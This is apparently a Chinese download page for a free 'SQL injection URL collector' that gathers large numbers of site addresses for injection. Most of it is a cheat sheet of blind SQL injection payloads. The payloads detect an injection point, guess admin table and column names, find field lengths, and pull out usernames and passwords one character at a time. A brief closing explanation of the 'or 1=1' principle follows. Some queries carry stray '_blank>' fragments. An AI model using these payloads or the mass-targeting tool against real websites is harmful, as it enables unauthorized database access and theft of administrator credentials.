阿修SQL注入網(wǎng)址采集器是可以一鍵的幫助你注入你需要的大量網(wǎng)站網(wǎng)址的,這個應該是一些數(shù)據(jù)庫使用者有可能使用到的一款小工具,現(xiàn)在可以免費的為你提供,有需要的可以免費下載試試效果怎么樣!
sql注入語句部分展示
1.判斷有無注入點
; and 1=1 and 1=2
2.猜表一般的表的名稱無非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判斷是否存在admin這張表
3.猜帳號數(shù)目 如果遇到0< 返回正確頁面 1<返回錯誤頁面說明帳號數(shù)目就是1個
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
4.猜解字段名稱 在len( ) 括號里面加上我們想到的字段名稱.
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(用戶字段名稱name)>0)
and 1=(select count(*) from admin where len(_blank>密碼字段名稱password)>0)
5.猜解各個字段的長度 猜解長度就是把>0變換 直到返回正確頁面為止
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6) 錯誤
and 1=(select count(*) from admin where len(name)>5) 正確 長度是6
and 1=(select count(*) from admin where len(name)=6) 正確
and 1=(select count(*) from admin where len(password)>11) 正確
and 1=(select count(*) from admin where len(password)>12) 錯誤 長度是12
and 1=(select count(*) from admin where len(password)=12) 正確
6.猜解字符
and 1=(select count(*) from admin where left(name,1)=a) ---猜解用戶帳號的第一位
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用戶帳號的第二位
就這樣一次加一個字符這樣猜,猜到夠你剛才猜出來的多少位了就對了,帳號就算出來了
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
這個查詢語句可以猜解中文的用戶和_blank>密碼.只要把后面的數(shù)字換成中文的 ASSIC碼就OK.最后把結(jié)果再轉(zhuǎn)換成字符.
sql注入語句原理
原理是基本的sql語句 簡單的說就是把一個正常的sql語句的邏輯轉(zhuǎn)換成另一種不正常的sql語句邏輯 基本的例子:查詢數(shù)據(jù) select * from tablename where id='admin' 現(xiàn)在我們查找 名為admin的用戶 如果我們在后面加一個 or 1=1;sql語句變成了 select * from tablename where id='admin' or 1=1這樣導致了 where 語句無用了 。查詢出了所有的用戶 信息 但是現(xiàn)在做開發(fā)的時候,都盡量不要用sql拼接 所以注入漏洞也少了 。。
- PC官方版
- 安卓官方手機版
- IOS官方手機版